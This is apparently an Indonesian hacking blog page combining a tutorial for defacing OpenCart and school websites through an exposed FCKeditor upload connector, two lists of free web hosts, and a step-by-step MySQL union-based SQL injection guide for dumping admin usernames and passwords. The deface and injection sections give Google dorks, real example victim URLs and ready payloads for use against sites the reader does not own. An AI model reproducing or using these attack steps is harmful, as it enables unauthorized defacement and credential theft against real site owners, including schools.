Tutorial Deface Remote File Upload Opencart



Ok sekarang langsung saja kita praktekan cara Deface Remote File Upload Opencart
 
1.  Tentunya kita memerlukan Dork untuk mencari targetnya di Google
      Dork : Powered By OpenCart site:com

2.  Sudah dapet targetnya ?
     Contoh : http://www.homemadestuff.co.uk

3.  Setelah itu kita membutuhkan POC
     POC : admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

4.  Kita Inject Exploitnya dengan POC diatas, sehingga jadinya seperti ini :
    
http://http://www.homemadestuff.co.uk/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
 
5.  Maka akan muncul sebuah tampilan
     Contoh :
http://imageshack.us/f/215/61228773.png/

6.  Ganti  connectornya menjadi  dari ASP menjadi PHP

7.  Upload File Tampilan Deface kita (*.html  atau *.htm)

8.  Jika berhasil maka ada bacaan alert seperti ini "file uploaded with no errors"
     Contoh : http://imageshack.us/f/841/76539701.png/

9.  Untuk melihat apakan berhasil di upload atau tidak kita ke "Get Folders and Files"
     dan lihat hasilnya.


10. Jika berhasil kamu tinggal masukin nama file deface kamu di blakang site nya,,
      Hasil : 
http://www.homemadestuff.co.uk/rifqi.html

 beberapa kata saya ambil dari blog ini : http://noi-shadow.blogspot.com/2011/12/tekhnik-remote-file-upload-opencart.html

 Tag : deface cara tutorial remote uploud open cart 

Cara Deface situs http://site.sch.id



Cuma mau S'hare bug l'wass .. ..

Siapin file .txt .. ..

B'ka http://google.com/ .. ..

M'sukin Dork :
inurl:/html/siswa.php?
inurl:/html/alumni.php?
inurl:/html/guru.php?

P'lih k'rban t'rserah .. ..

Contoh korban : http://smp1ponjong.sch.id/html/siswa.php

M'sukin Exploit :

http://smp1ponjong.sch.id/html/siswa.php
 

G'nti j'di :
http://smp1ponjong.sch.id/editor/filemanager/connectors/test.html
 

D'kolom Connector yang default'a ASP j'dikan PHP t'rus Resource Type g'nti File .. .. T'rus klik Browse .. ..
c'ri file.txt yang uda d'siapin .. .. k'lo uda klik Open > Upload

Hasil'a :
http://site.sch.id/userfiles/file/namafile.txt
http://site.sch.id/userfiles/namafile.txt



Ini c'ntoh'a :

http://sma1jepon.sch.id/userfiles/file/Rifqii.txt

Sumber

Kalau ada yang mau di tanyain comment ajah ya

tag : deface sch.id sch id cara tutorial

19 Tempat Hosting dan Subdomain Gratis






Baiklah perkenalkan nama saya Akai, saya masih baru menjadi penulis di ilmuwebsite.com. Saya ingin sekali berbagi ilmu yang saya miliki melalui artikel ini. Berbekal dari banyaknya orang mencari hosting-hosting bagus sekaligus free dan no ads sehingga saya merasa berkewajiban untuk membahas 19 tempat hosting yang fitur nya lumayan bagus. Oke, di bawah ini adalah daftar free hosting yang memiliki kualitas lumayan.

1. PHPNet.us
Space 350MB space, 15GB bandwidth, No banner
Didukung control panel menggunakan Vista Panel, MySQL, PHP, FTP, Free subdomain (username.phpnet.us). Cocok digunakan untuk e-commerce shop, galeri foto pribadi atau sistem bisnis manajemen konten. Dari tampilan halaman bagian bawah situs ini, Anda akan menemukan banyak sekali hosting gratisan yang serupa dengan PHPNet.us

2. DotEasy.com

Space 100 MB, Bandwidth 1000 MB, No banner
Host Paket hosting gratis di situs ini mendukung Microsoft FrontPage dan Dreamweaver. Juga menyediakan layanan yang lengkap, seperti Website Builder, Blog, Gallery dan WebForum.

3. AgilityHoster.com

Space 200 MB, Bandwidth 5 GB, No Banner
Hostingan ini mendukung PHP, Perl, CGI dan MySQL, 5 account email khusus website anda dan banyak lagi.

4. HyperPHP.com

Space 250 MB, Bandwidth 6 GB, No banner
Tampilan situs ini mirip dengan My-PHP.net, mungkin saja mereka pernah satu jurusan di perkuliahan. Bahkan Kuota dan Fitur pun menyerupai My-PHP.net. Jika Anda pernah mencoba layanan My-PHP.net, seperti itulah kualitas layanan yang diberikan HyperPHP.com.

5. IfastNet.com

Space 300 MB, Bandwidth 6 GB, No banner
Hostingan ini patut dicoba, layanannya lumayan bagus. Support FTP account, Unlimited POP email accounts, Fantastico type installer, VistaPanel Control Panel, 5 MySQL databases.

6. IpowerHosts.com

Space 25 MB, Bandwidth 2 GB, No banner
Support email gratis berbasis web, data backup gratis, control panel web, guest book, file manager, online website builder dan banyak lagi.
7. FreeServers.com
Space 50 MB, Bandwidth 1 GB, No banner
Layanan hostingan ini lumayan bagus. Belum banyak netter indonesia yang mengenal hostingan ini, mungkin karena fitur-fiturnya yang kurang lengkap. Seperti tidak didukungnya fitur FTP Access dan blog WordPress Script.
8. JustFreeHost.com
Space 100 MB, Bandwidth 1 GB, No banner
Sebanyak 120 ribu subdomain telah tercipta dari situs ini, layanannya belum kami ketahui karena kami belum pernah mencobanya. Tapi, tak ada salahnya jika Anda mencoba layanan hostingan ini. Menurut informasi dari ?mbah Google? JustFreeHost.com kurang menarik untuk dijadikan hostingan situs resmi, lebih asyik jika hanya dimanfaatkan untuk latihan membuat situs, walhasil? banyak dari situs-situs koleksi JustFreeHost.com terlantar dan tidak dihiraukan.
9. GetFreeHosting.co.uk
Space 300 MB, Bandwidth 10 GB, No banner
Ni salah satu hostingan terbaik dengan fitur paling banyak dari standar hosting gratisan, Anda bisa menikmati layanan Auto Script yang lengkap dan mendukung Joomla, Vista Panel, Full ht.access, Monitor websites, Full FTP Access, Blog, forum, Layanan 24 Jam with Live chat dan Free Bonus Extras.
10. FreeHosty.com
Space 300 MB, Bandwidth 10 GB, No banner
Fitur yang akan Anda dapatkan dari hostingan ini : Vista Panel, Web mail, PHP Flags manager, POP email accounts, 7 MySQL databases, Automatic installer (29 scripts), Password protected folders, 5 Add-on domains, FTP account, Php MyAdmin, 5 Sub domains, File manager (browser upload)
11. FreeHostPage.com
Space Unlimitted, Bandwidth Unlimitted, no banner,
Hosting gratisan yang ini memang menghebohkan, menyediakan layanan serba unlimitted, udah gitu tanpa banner. Syaratnya, anda Cuma diharuskan memiliki domain.com, selain domain.com anda tidak bisa menggunakan layanan hostingan gratisan ini.
12. MorganHosting.co.cc
Space MB , Bandwidth 1027 MB, No banner
Salah satu hosting gratisan terbaik milik indonesia. Kami sudah pernah mencoba layanan hostingan ini. Yang patut di acungi jempol adalah control panelnya menggunakan Vista Panel. Tapi sayang, agak lemot saat login ke control panelnya, mungkin akibat dari banner-banner iklan yang banyak ditampilkan di control panel.
13. OxyHost.com
Space 5 GB, Bandwidth 100 GB, no banner
Ni hostingan tergolong masih baru, baru berdiri tahun 2008. Tapi jangan salah sangka, walaupun masih baru berdiri di tahun 2008, hostingan ini menjadi menarik dengan tersedianya ht.access bagi para reseller mania. Agak sulit memang mencari hostingan gratis yang tersedia layanan ht.access. Untuk mendapatkan hosting gratisan OxyHost.com, sebelumnya anda diharuskan menjadi member OxyTown.com. Setelah mendaftar menjadi member, kemudian Anda akan diberikan no keanggotaan. No tersebut berguna saat mengisi formulir pendaftaran OxyHost.com. Bagi yang tidak mengerti bahasa inggris mungkin akan kesulitan mencari letak no keanggotaan tersebut. Agak tersembunyi di antara Postingan Forum.
14. Fusedtree.com
Space 20 GB, Bandwidth 200 GB, no banner
Ada lagi layanan hostingan yang bagus, namanya Fusedtree.com, space yang besar dan bandwidth yang besar, menjadikan hostingan ini faforit di luar negri (selain negara indonesia tentunya). Tapi, sayangnya Fusedtree.com terlihat kurang profesional, terbukti dari email layanannya yang masih menggunakan google mail.
15. FreeHostingz.com,
Space 10 GB, Bandwidth 100 GB, No banner
Memiliki fitur PHP 5, SQL support, Installer Script, Free web statistic, Website Builder instant activation, dan lain-lain.

16. T35.com

Space Unlimitted, Bandwidth Unlimitted, No banner
Ini juga layanan hostingan serba Unlimitted, entah kenapa banyak yang berminat menggunakan hosting gratisan ini. Layanannya lumayan baik. Beberapa pengguna internet di indonesia juga lumayan banyak menggunakan layanan situs ini, tapi tak sedikit pula yang kemudian menelantarkan account mereka. Kebanyakan para netter menggunakan situs ini untuk coba-coba.
17. FreeWeb7.com
Space 7 GB, Bandwidth 100 GB, No banner
Layanan dari hostingan ini cukup baik, keluhan Anda siap dilayani selama 7?24 jam.
18. Bplaced.net
Space 2GB, Bandwidth Unlimitted, No banner
Layanan hostingannya terlihat lebih profesional. Anda bisa mencobanya. Situs ini dilengkapi fitur PHP5, FTP access, MySQL & PostgreSQL, dan 2 pilihan gratisan lainnya dengan layanan yang berbeda.
19. Quotaless.com
Space Unlimitted, Bandwidth Unlimitted, No banner
Situs dengan Layanan Unlimitted pertama kali di internet ini lumayan banyak peminatnya (selain pengguna internet di indonesia). Tapi sayang, layanannya kurang memuaskan. Anda memang mendapatkan layanan Unlimitted, tapi anda tidak bisa meng-upload file ke control panel ?file manager?. Lalu apa gunanya layanan unlimitted???
Jika Anda berminat dan ingin menggunakan layanan situs ini, setelah memiliki account, Anda tidak perlu lagi meng-upload file-file milik anda, cukup menggunakan Fantastisco Auto Installer, dan kemudian install tampilan situs yang Anda inginkan.

umber

Free Web Hosting Gratis Indonesia



Hosting gratis Indonesia dan free domain yang dapat rekan-rekan temukan, sebut saja seperti webhost www.000webhost.com dan banyak  free hosting lainnya. ada yang menawarkan Hosting gratis tapi dibatasi speednya, ada yang diharuskan update berkala dsb, bahkan ada juga yang nggak mengharuskan apapun.
Hosting Gratis Indonesia ini dapat menjadi pilihan bagi Anda yang ingin menggunakan layanan hosting gratis baik untuk situs ataupun blog. Layanan Hosting Gratis ini juga menyediakan fasilitas CPanel untuk mengelola file website kita.
Sebagai review, ada 2 contoh hosting yang menyediakan Hosting gratis yang kita bahas:
1. free.idesegarhosting.com :
Syarat: ( GA ADA SYARAT )
  • Tidak harus memiliki nama domain, karena juga disediakan free subdomain di sini, tapi kalaupun mau pakai domain berbayar seperti ekstensi: .com, .net, .org, .info, dll. juga menerima domain gratis seperti: .co.cc, co.nr, dll ( tinggal arahkan domainnya ke server idesegarhosting.com aja). Jika belum memiliki domain kita dapat juga membeli di tempat mereka atau di tempat lain.
  • Langsung Auto approve aktivasi, no link support.
  • Berbasis Free Hostgator Hosting
  • Blog atau website tidak harus update.
  • Blog yang bebas berbahasa apapun.
  • Masa aktif selamanya.
  • Hosting Gratis ini menyediakan kapasitas 100MB dan 1000MB dan 10.000MB
  • Support Wordpress, joomla, drupal, dll
1. onefreehosting.com :
Syarat: ( GA ADA SYARAT )
  • Tidak harus memiliki nama domain, karena juga disediakan free subdomain di sini, tapi kalaupun mau pakai domain berbayar seperti ekstensi: .com, .net, .org, .info, dll. juga menerima domain gratis seperti: .co.cc, co.nr, dll ( tinggal arahkan domainnya ke server idesegarhosting.com aja). Jika belum memiliki domain kita dapat juga membeli di tempat mereka atau di tempat lain.
  • Langsung Auto approve aktivasi, no link support.
  • Berbasis Free Hostgator Hosting
  • Blog atau website tidak harus update.
  • Blog yang bebas berbahasa apapun.
  • Masa aktif selamanya.
  • Hosting Gratis ini menyediakan kapasitas 100MB dan 1000MB dan 10.000MB
  • Support Wordpress, joomla, drupal, dll
2. JavaHostInd*:
Syarat:
  • Memiliki nama domain berbayar seperti ekstensi: .com, .net, .org, .info, dll. Namun tidak dapat menerima domain gratis seperti: .co.cc, co.nr, dll. Jika belum memiliki domain kita dapat juga membeli di tempat mereka atau di tempat lain.
  • Memasang 2 buah link yang menuju ke situs mereka jika akun kita telah diaktifkan, link dan banner yang akan dipasang akan dijelaskan pada email aktivasi akun kita. Proses aktivasi akun memakan waktu 2-3 hari, bahkan kadang beberapa jam sudah aktif.
  • Blog atau website harus diupdate minimal 1 kali dalam 2 minggu.
  • Blog yang akan kita letakkan di sana harus berbahasa Indonesia.
  • Akun kita yang telah diaktifkan harus digunakan atau ditempati segera, jika telah lewat 10 (sepuluh) hari belum ditempati, maka akan dihapus secara otomatis.
  • Hosting Gratis ini menyediakan kapasitas 500MB dan 7000MB Bandwidth.
Mohon maaf, artikel ini cuma sebagai perbandingan dan bukan bermaksud menjatuhkan Hosting lainnya. Semoga pembaca dapat memahami bahwa admin hanya ingin menyampaikan beberapa perbedaan pada contoh.

Tutorial Deface My SQLI



 
Pengertian sql injection:
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ' atau -
comments: /* atau --
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x

===========
=step Satu:=
===========

carilah target
misal: [site]/berita.php?id=100

Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh:
[site]/berita.php?id=100' atau
[site]/berita.php?id=-100
ehingga muncul pesan error seperti berikut (masih bnyak lagi):


==========
=step Dua:=
==========

mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : order by

contoh:


[site]/berita.php?id=-100+order+by+1-- atau
[site]/berita.php?id=-100+order+by+1/*

ceklah secara step by step (satupersatu)...
misal:


[site]/berita.php?id=-100+order+by+1--
[site]/berita.php?id=-100+order+by+2--
[site]/berita.php?id=-100+order+by+3--
[site]/berita.php?id=-100+order+by+4--

sehingga muncul error atau hilang pesan error...
misal: [site]/berita.php?id=-100+order+by+9--

berarti yang kita ambil adalah sampai angka 8
menjadi [site]/berita.php?id=-100+order+by+8--


===========
=step Tiga:=
===========

untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--

ok seumpama yg keluar angka 5

gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--

lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..


============
=step Empat:=
============

untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--

seumpama table yang muncul adalah "admin"


===========
=step Lima:=
===========

untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema. ​tables+where+table_schema=database()--

=============
= step Enam: =
=============

perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema ​.columns+where+table_name=0xhexa--

pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :

http://www.v3n0m.net/ascii.htm

contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema ​.columns+where+table_name=0x61646D696E--

============
=step Tujuh:=
============

memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--

contoh kata yang keluar adalah id,username,password

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--

==============
= step Delapan:=
==============

tahap terakhir mencari halam admin atau login .


Silahkan DI pelajari Kaka 1 .

Kalo ada yg susah jngan malu bertanya ya .
Sumber

Kategori

Kategori